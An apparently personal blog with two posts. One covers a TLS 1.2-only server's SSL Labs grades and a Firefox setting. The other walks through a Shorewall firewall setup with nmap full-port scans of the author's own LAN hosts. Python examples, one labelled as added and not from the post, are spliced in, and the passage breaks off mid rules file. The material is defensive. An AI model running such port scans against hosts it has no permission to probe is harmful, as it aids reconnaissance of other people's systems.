Qualys SSL Labs Test results for AndrzejL.no-ip.org and Firefox TLSv1.2 fix.

Hi there.

I have been motivated by a new colleague to enable Forward Secrecy for WoTW WWW server. I did it. I have also tested the website on the Qualys SSL Labs website. Here are the results.

Qualys SSL Labs test results

As You can see I got quite high scores. I failed only because the SSL certificate was not trusted. I cannot get another certificate for the no-ip domain simply because I do not own the no-ip domain, only a subdomain. Plus, in the times of Snowden’s revelations, who really trusts Certificate Authorities when governments can force any CA to give up their master keys or to create a valid certificate so they can snoop on SSL connections to “test” something… Also I decided (some time ago) to disable all protocols but TLSv1.2. The SSL Labs test results say that this site will fail with many clients / browsers because of that… To this I say: update / fix Your browsers, people. I don’t care for browsers that cannot work with the latest / greatest crypto. I don’t have to be compatible with older browsers. I would rather force people to use the latest / most secure protocols / browsers that work with them than allow compatibility between older browsers and my server by lowering the crypto standards on my server.

Unfortunately I have noticed that Firefox has a problem with TLSv1.2 and since it’s my browser of choice I have investigated it. Here is a fix:

a) open browser
b) paste this into the address bar:

about:config?filter=security.tls.version.max

c) find the variable

security.tls.version.max

d) double click on it
e) change its default value to:

3

f) close and re-open the browser

There – fixed. Mozilla finally got their act together – upgrade Your browser to version 27 (or newer). There… now Your Firefox can work with latest TLS version…

For those that want to know more here is the link. For those that will be complaining about the compatibility with older websites I say this – IF the server does not provide TLSv1.2 then why bother providing https at all? Those servers are outdated and/or badly configured. Neither of those is good for security.
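Whether a connection to a TLSv1.2-only server like the one above succeeds is decided by the versions the client offers in its ClientHello; Firefox’s security.tls.version.max caps that offer (1 = TLS 1.0, 3 = TLS 1.2). The Python below is an added example and not code from this post: it builds minimal, constructed ClientHello records, parses the offered versions (the legacy_version field, or the supported_versions extension a TLS 1.3 client sends) and reports what a server restricted to TLS 1.2 would negotiate. The record layout follows the TLS specification; the random bytes and the cipher suite list are made up, and a real hello carries many more extensions.

```python
import struct

# TLS protocol versions as they appear on the wire: (major, minor)
TLS_NAMES = {(3, 1): "TLS 1.0", (3, 2): "TLS 1.1", (3, 3): "TLS 1.2", (3, 4): "TLS 1.3"}
SUPPORTED_VERSIONS_EXT = 0x002B


def build_client_hello(legacy_version, supported_versions=None):
    """Construct a minimal ClientHello record as test input (constructed data,
    not a capture; a real hello carries more extensions and cipher suites)."""
    body = struct.pack("!BB", *legacy_version)           # legacy_version field
    body += b"\x11" * 32                                  # client random (constructed)
    body += b"\x00"                                       # empty session id
    suites = b"\xc0\x2f\xc0\x30"                          # two ECDHE suites (constructed list)
    body += struct.pack("!H", len(suites)) + suites
    body += b"\x01\x00"                                   # compression methods: null only
    exts = b""
    if supported_versions:
        vers = b"".join(struct.pack("!BB", *v) for v in supported_versions)
        ext_data = struct.pack("!B", len(vers)) + vers
        exts += struct.pack("!HH", SUPPORTED_VERSIONS_EXT, len(ext_data)) + ext_data
    body += struct.pack("!H", len(exts)) + exts
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def offered_versions(record):
    """Return the sorted list of (major, minor) versions a ClientHello offers."""
    if record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    legacy = (body[0], body[1])
    pos = 2 + 32                                            # skip legacy_version and random
    pos += 1 + body[pos]                                    # session id
    pos += 2 + struct.unpack("!H", body[pos:pos + 2])[0]    # cipher suites
    pos += 1 + body[pos]                                    # compression methods
    versions = None
    if pos + 2 <= len(body):                                # extensions are optional
        end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]
        pos += 2
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", body[pos:pos + 4])
            edata = body[pos + 4:pos + 4 + elen]
            pos += 4 + elen
            if etype == SUPPORTED_VERSIONS_EXT:
                n = edata[0]
                versions = [(edata[i], edata[i + 1]) for i in range(1, 1 + n, 2)]
    if versions is None:
        # Pre-1.3 client: legacy_version is the highest version it supports and
        # the server may pick anything from there down to its own minimum.
        versions = [v for v in TLS_NAMES if v <= legacy]
    return sorted(versions)


def server_accepts(record, server_versions=((3, 3),)):
    """Version a server restricted to server_versions would negotiate, or None
    when the handshake fails (what an old Firefox hits against a TLS 1.2-only server)."""
    common = [v for v in offered_versions(record) if v in server_versions]
    return max(common) if common else None


if __name__ == "__main__":
    for label, hello in [
        ("Firefox capped at TLS 1.0 (security.tls.version.max=1)", build_client_hello((3, 1))),
        ("Firefox after the fix (security.tls.version.max=3)", build_client_hello((3, 3))),
        ("TLS 1.3 client", build_client_hello((3, 3), [(3, 4), (3, 3)])),
    ]:
        picked = server_accepts(hello)
        print(f"{label}: offers {[TLS_NAMES[v] for v in offered_versions(hello)]} ->",
              TLS_NAMES[picked] if picked else "handshake fails against a TLS 1.2-only server")
```

The same parser run over a packet capture of your own clients shows who would be locked out by a TLS 1.2-only policy before you enforce it.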

And another thing… Bank of Ireland had weaker scores than my site and provides no Forward Secrecy…

Bank Of Ireland Qualys SSL Labs Test Results

Of course they got A grade. Their cert is valid.

Cheers.

Andrzej

Configuring shorewall for LAN ipv4 connection.

Hi folks.

What is shorewall? Well, this is not Wikipedia so I won’t go into the details. Suffice to say it’s a firewall. I must underline here that I am in no way an expert on the subject of security, nor am I a firewall expert. I am posting this info for my own use, as those settings have served me well (unlike my memory) in the past and I would like to re-use them in the future without struggling to remember – but if You want to use them (and maybe later improve them to suit Your needs) then go ahead – feel free to do so, just be aware that I am taking no responsibility whatsoever for the security of Your machine and the consequences of it getting hacked. I hereby confirm that this config is what I use at home and that it’s safe and secure to the best of my knowledge.

Here it goes:

1) First install the shorewall

su

give it root’s password

pacman -S shorewall

resolving dependencies…
looking for inter-conflicts…

Packages (1): shorewall-4.5.19-1

Total Installed Size: 2.23 MiB

:: Proceed with installation? [Y/n] y
(1/1) checking keys in keyring [###############################################] 100%
(1/1) checking package integrity [###############################################] 100%
(1/1) loading package files [###############################################] 100%
(1/1) checking for file conflicts [###############################################] 100%
(1/1) checking available disk space [###############################################] 100%
(1/1) installing shorewall [###############################################] 100%

2) Enable shorewall at boot time.

systemctl enable shorewall

You should see this as an output:

ln -s '/usr/lib/systemd/system/shorewall.service' '/etc/systemd/system/multi-user.target.wants/shorewall.service'

3) Find out what network interfaces You have:

ip link

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT qlen 1000
link/ether 00:1e:52:7a:46:5d brd ff:ff:ff:ff:ff:ff
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT qlen 1000
link/ether 00:0a:e4:f6:d4:8f brd ff:ff:ff:ff:ff:ff

4) Check what ports are open on the machine before shorewall gets configured and started (optional) by scanning it from another machine using nmap. wishmacer is using 192.168.0.100 ip addy and I am scanning it from another local machine icsserver which is using 192.168.0.1 ip addy:

date && nmap -p 0-65535 192.168.0.100 && date

Hint: You will be able to see the ETA if You press space during the scan.

Sat Aug 10 17:04:03 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:04 IST
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 4.46% done; ETC: 17:41 (0:00:21 remaining)
Nmap scan report for 192.168.0.100
Host is up (0.00014s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
7634/tcp open hddtemp
50505/tcp open unknown
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 16.37 seconds
Sat Aug 10 17:04:20 IST 2013

It took 16.5 seconds roughly to scan all the 65536 ports and it discovered 2 open tcp ports 7634 and 50505.

5) Configure shorewall accordingly:

To configure shorewall You will use Your favorite text editor (vi, mcedit, nano etc. whatever ails You) as root. Config files are stored in the folder:

/etc/shorewall

A) /etc/shorewall/shorewall.conf

Find these values:

STARTUP_ENABLED=No

AUTOMAKE=No

BLACKLIST="NEW,INVALID,UNTRACKED"

and change No to Yes and "NEW,INVALID,UNTRACKED" to ALL, so they look like this:

STARTUP_ENABLED=Yes

AUTOMAKE=Yes

BLACKLIST=ALL

Now check if your shorewall.conf contains an entry (if you have the latest version of shorewall from ArchLinux repository and you’ve merged your .pacnew file it will):

WORKAROUND=Yes

and if it does – change it to:

WORKAROUND=No

Why? Workarounds are needed for older distros like Debian or CentOS. ArchLinux does not need them.

B) /etc/shorewall/zones

Add these 2 lines at the end of the file:

net ipv4
#LAST LINE - ADD YOUR ENTRIES ABOVE THIS ONE - DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 - Zones File
#
# For information about this file, type "man shorewall-zones"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-zones.html
#
##################################
#ZONE TYPE OPTIONS IN OUT
# OPTIONS OPTIONS
fw firewall
net ipv4
#LAST LINE - ADD YOUR ENTRIES ABOVE THIS ONE - DO NOT REMOVE

C) /etc/shorewall/interfaces

Here You will use the info gathered in point 3. So in my case the network interfaces are eth0 and wlan0 – the wireless network is not used at the moment (but we will define it anyway) and the interface eth0 is connected to my router.

Add these 3 lines at the end of the file:

net eth0 -
net wlan0 -
#LAST LINE -- DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 - Interfaces File
#
# For information about entries in this file, type "man shorewall-interfaces"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-interfaces.html
#
##################################
FORMAT 2
##################################
#ZONE INTERFACE OPTIONS
net eth0 -
net wlan0 -
#LAST LINE -- DO NOT REMOVE

D) /etc/shorewall/policy

Add these 4 lines to the end of the file:

fw net ACCEPT
net all DROP info
all all DROP info
#LAST LINE -- DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 - Policy File
#
# For information about entries in this file, type "man shorewall-policy"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-policy.html
#
##################################
#SOURCE DEST POLICY LOG LIMIT: CONNLIMIT:
# LEVEL BURST MASK
fw net ACCEPT
net all DROP info
all all DROP info
#LAST LINE -- DO NOT REMOVE

6) Start shorewall:

systemctl start shorewall

7) Check its status:

journalctl -xn

-- Logs begin at Fri 2013-08-09 23:23:46 IST, end at Sat 2013-08-10 17:01:44 IST. --
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Martian Logging…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Proxy ARP…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Preparing iptables-restore input…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Running /sbin/iptables-restore…
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: IPv4 Forwarding Enabled
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/start …
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/started …
Aug 10 17:01:44 wishmacer.loc logger[2279]: Shorewall started
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: done.
Aug 10 17:01:44 wishmacer.loc systemd[1]: Started Shorewall IPv4 firewall.
-- Subject: Unit shorewall.service has finished start-up
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel

-- Unit shorewall.service has finished starting up.

-- The start-up result is done.

systemctl status shorewall

shorewall.service - Shorewall IPv4 firewall
Loaded: loaded (/usr/lib/systemd/system/shorewall.service; enabled)
Active: active (exited) since Sat 2013-08-10 17:01:44 IST; 2min 57s ago
Process: 2069 ExecStart=/usr/bin/shorewall $OPTIONS start (code=exited, status=0/SUCCESS)

Aug 10 17:01:42 wishmacer.loc systemd[1]: Starting Shorewall IPv4 firewall…
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Compiling…
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: perl: warning: Setting locale failed.
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: perl: warning: Please check that your locale settings:
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: LANGUAGE = (unset),
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: LC_ALL = (unset),
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: LANG = "en_UK.UTF-8"
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: are supported and installed on your system.
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: perl: warning: Falling back to the standard locale ("C").
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/params …
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/shorewall.conf…
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Loading Modules…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/zones…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/interfaces…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Determining Hosts in Zones…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Locating Action Files…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/policy…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Running /etc/shorewall/initdone…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling Kernel Route Filtering…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling Martian Logging…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling MAC Filtration -- Phase 1…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/rules…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/conntrack…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling MAC Filtration -- Phase 2…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Applying Policies…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /usr/share/shorewall/action.Drop for chain Drop…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /usr/share/shorewall/action.Broadcast for chain Broadcast…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Generating Rule Matrix…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /usr/share/shorewall/action.Reject for chain Reject…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Creating iptables-restore input…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Shorewall configuration compiled to /var/lib/shorewall/.start
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Starting Shorewall….
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Initializing…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/init …
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/tcclear …
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Route Filtering…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Martian Logging…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Proxy ARP…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Preparing iptables-restore input…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Running /sbin/iptables-restore…
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: IPv4 Forwarding Enabled
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/start …
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/started …
Aug 10 17:01:44 wishmacer.loc logger[2279]: Shorewall started
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: done.
Aug 10 17:01:44 wishmacer.loc systemd[1]: Started Shorewall IPv4 firewall.

8) Check if it’s working as expected (optional) and scan it from another machine using nmap. wishmacer is using 192.168.0.100 ip addy and I am scanning it from another local machine icsserver which is using 192.168.0.1 ip addy:

Hint: You will be able to see the ETA if You press space during the scan.

date && nmap -p 0-65535 192.168.0.100 && date

Sat Aug 10 17:14:00 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:14 IST
Stats: 0:10:22 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 46.31% done; ETC: 17:36 (0:11:46 remaining)
Stats: 0:21:33 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 97.43% done; ETC: 17:36 (0:00:34 remaining)
Nmap scan report for 192.168.0.100
Host is up (0.00016s latency).
All 65536 scanned ports on 192.168.0.100 are filtered
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 1327.34 seconds
Sat Aug 10 17:36:07 IST 2013

It took 22 minutes roughly to scan all the 65536 ports. All of them are closed / filtered.

9) Add Your custom rules. For example on Wishmacer / 192.168.0.100 I have a service running at tcp port 50505. I want to open it.

Modify this file:

/etc/shorewall/rules

by adding those 2 lines:

ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
?SECTION ALL
?SECTION ESTABLISHED
?SECTION RELATED
?SECTION INVALID
?SECTION UNTRACKED
?SECTION NEW
# Allow access to port 50505 TCP - SSHD
ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

and restart Your firewall using this command:

systemctl restart shorewall

and test if it worked from a different machine:

date && nmap -p 7634 192.168.0.100 && date

Sat Aug 10 17:48:25 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:48 IST
Nmap scan report for 192.168.0.100
Host is up (0.00016s latency).
PORT STATE SERVICE
7634/tcp filtered hddtemp
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
Sat Aug 10 17:48:38 IST 2013

date && nmap -p 50505 192.168.0.100 && date

Sat Aug 10 17:48:45 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:48 IST
Nmap scan report for 192.168.0.100
Host is up (0.00019s latency).
PORT STATE SERVICE
50505/tcp open unknown
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
Sat Aug 10 17:48:59 IST 2013

As You can see port 7634 which was previously (before shorewall configuration / start) open is now marked as filtered and the 50505 which I chose to open on my firewall is now open and ready to use.
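With zones, interfaces, policy and the first rule in place, it is worth cross-checking that the four files agree with each other before restarting the firewall (shorewall’s own `shorewall check` compiles the configuration without installing it). The Python below is an added example, not part of this post or of Shorewall: it parses the files from the steps above (embedded here as constructed strings) and flags zones that are referenced but never declared, a missing or misplaced `all all` catch-all policy, and a wrong number of firewall zones. The `RULES_WITH_WAN` variant reproduces a trap from the DNAT rules further down the post, which refer to a `wan` zone that the zones and interfaces files shown here never declare.

```python
# Constructed copies of the files built up in steps 5 and 9 of the post.
ZONES = """\
#ZONE TYPE OPTIONS
fw firewall
net ipv4
#LAST LINE - ADD YOUR ENTRIES ABOVE THIS ONE - DO NOT REMOVE
"""
INTERFACES = """\
FORMAT 2
#ZONE INTERFACE OPTIONS
net eth0 -
net wlan0 -
#LAST LINE -- DO NOT REMOVE
"""
POLICY = """\
#SOURCE DEST POLICY LOG
fw net ACCEPT
net all DROP info
all all DROP info
#LAST LINE -- DO NOT REMOVE
"""
RULES = """\
SECTION NEW
Ping(ACCEPT) net fw
ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE
"""
# Constructed variant: a DNAT rule that names a 'wan' zone the files above never declare.
RULES_WITH_WAN = RULES.replace(
    "SECTION NEW\n", "SECTION NEW\nDNAT wan net:192.168.0.100 tcp 4000 - 192.168.1.50\n")
# Constructed variant: a policy line placed after the catch-all, where it can never match.
POLICY_UNREACHABLE = POLICY.replace("#LAST LINE", "net fw ACCEPT\n#LAST LINE")


def parse_table(text):
    """Split a Shorewall table file into column lists, dropping comments and
    the FORMAT / SECTION / ?SECTION directives."""
    rows = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith(("?", "FORMAT ", "SECTION ")):
            continue
        rows.append(line.split())
    return rows


def zone_of(ref):
    """'net:1.2.3.4' or 'net:192.168.0.100:6112' -> 'net'."""
    return ref.split(":", 1)[0]


def check_config(zones_text, interfaces_text, policy_text, rules_text=""):
    """Return a list of problems; an empty list means the files agree."""
    problems = []
    zones = {c[0]: (c[1] if len(c) > 1 else "ipv4") for c in parse_table(zones_text)}
    firewall_zones = [z for z, t in zones.items() if t == "firewall"]
    if len(firewall_zones) != 1:
        problems.append(f"zones: expected exactly one firewall zone, found {firewall_zones}")
    known = set(zones) | {"all", "$FW"}   # $FW is Shorewall's alias for the firewall zone

    for cols in parse_table(interfaces_text):
        if cols[0] not in zones:
            problems.append(f"interfaces: zone {cols[0]!r} on {cols[1]} is not declared in zones")

    policies = parse_table(policy_text)
    for cols in policies:
        for ref in cols[:2]:
            if zone_of(ref) not in known:
                problems.append(f"policy: zone {ref!r} is not declared in zones")
    catch_all = [i for i, c in enumerate(policies) if c[:2] == ["all", "all"]]
    if not catch_all:
        problems.append("policy: no 'all all' catch-all; add one as the last line")
    elif catch_all[0] != len(policies) - 1:
        problems.append("policy: lines after the 'all all' catch-all are never reached")

    for cols in parse_table(rules_text):
        for ref in cols[1:3]:               # SOURCE and DEST columns
            if zone_of(ref) not in known:
                problems.append(f"rules: zone {ref!r} in '{' '.join(cols)}' is not declared in zones")
    return problems


if __name__ == "__main__":
    print("post's config:", check_config(ZONES, INTERFACES, POLICY, RULES) or "no problems")
    for p in check_config(ZONES, INTERFACES, POLICY_UNREACHABLE, RULES_WITH_WAN):
        print("problem:", p)
```

Point it at the real files with `open("/etc/shorewall/zones").read()` and so on; the checker reads only the columns it needs, so the extra columns in a full-size rules file do not bother it.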

Now You can add more lines in this configuration file. Different ports, different protocols, different rules.

For example, if You want to open UDP port 123, add this line:

ACCEPT net fw udp 123 -

so it looks like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

save the file and restart firewall as You did before.

And what if I want to open a large range of ports? Let’s say… I want to open 250 TCP ports starting at 5000?

No problem – add another rule that looks like this:

ACCEPT net fw tcp 5000:5250 -

so it looks like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 5000:5250 -
ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

save the file and restart firewall as You did before.

Ok Andy… I have a problem… I cannot ping the machine anymore after the shorewall was started…

Ok… I am guessing You want the machine to respond to ping for whatever the reason.

Add this as a rule:

Ping(ACCEPT) net fw

so it looks like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 5000:5250 -
ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

save the file and restart firewall as You did before.

If You want to block a pest (let’s assume IP 1.2.3.4) that is messing with Your server add this line:

DROP net:1.2.3.4 all

so it looks like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 5000:5250 -
ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

save the file and restart firewall as You did before.

If the pest is using a dynamic IP and You know the range (let’s assume IP 2.*.*.*, which is 2.0.0.0/8 in CIDR notation) then add this line:

DROP net:2.0.0.0/8 all

so it looks like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
DROP net:2.0.0.0/8 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 5000:5250 -
ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

save the file and restart firewall as You did before.

It’s very important that You place the DROP lines before the ACCEPT lines.

If You want to forward a port (destination nat) to another IP / machine add a rule that will do it for You. Example:

I have 2 NICs in my machine.

– First has IP 192.168.1.50 and is defined as a wan zone.
– Second has IP 192.168.0.1 and is recognized by shorewall as a net zone.

There is another machine in my net zone. The machine’s IP is 192.168.0.100.

I want to forward port 4000 (both TCP and UDP) from the wan zone – IP 192.168.1.50 – to port 4000 on the net zone machine with the IP 192.168.0.100. This means that if any packet lands on port 4000 on the 192.168.1.50 machine it will be redirected (forwarded / dnated) to port 4000 on the 192.168.0.100 machine.

The rule will look like this:

DNAT wan net:192.168.0.100 tcp 4000 - 192.168.1.50
DNAT wan net:192.168.0.100 udp 4000 - 192.168.1.50

and the rules file will look like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
DROP net:2.0.0.0/8 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 5000:5250 -
ACCEPT net fw tcp 50505 -
DNAT wan net:192.168.0.100 tcp 4000 - 192.168.1.50
DNAT wan net:192.168.0.100 udp 4000 - 192.168.1.50
#LAST LINE -- DO NOT REMOVE

save the file and restart the firewall as You did before. Make sure that port 4000 (both TCP and UDP) is open on the 192.168.0.100 machine. How?

su -c "nmap -Pn -p 4000 192.168.0.100 && nmap -sU -Pn -p 4000 192.168.0.100"

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up (0.00012s latency).
PORT STATE SERVICE
4000/tcp open remoteanything

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up.
PORT STATE SERVICE
4000/udp open|filtered icq

Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds

The situation will look slightly different if the destination port and source port numbers are different. The scenario described above still applies: 2 NICs, wan and net zones, another machine in the net zone.

I want to forward port 6118 (both TCP and UDP) from the wan zone – IP 192.168.1.50 – to port 6112 on the net zone machine with the IP 192.168.0.100. This means that if any packet lands on port 6118 on the 192.168.1.50 machine it will be redirected (forwarded / dnated) to port 6112 on the 192.168.0.100 machine.

The rule will look like this:

DNAT wan net:192.168.0.100:6112 tcp 6118 - 192.168.1.50
DNAT wan net:192.168.0.100:6112 udp 6118 - 192.168.1.50

and the rules file will look like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
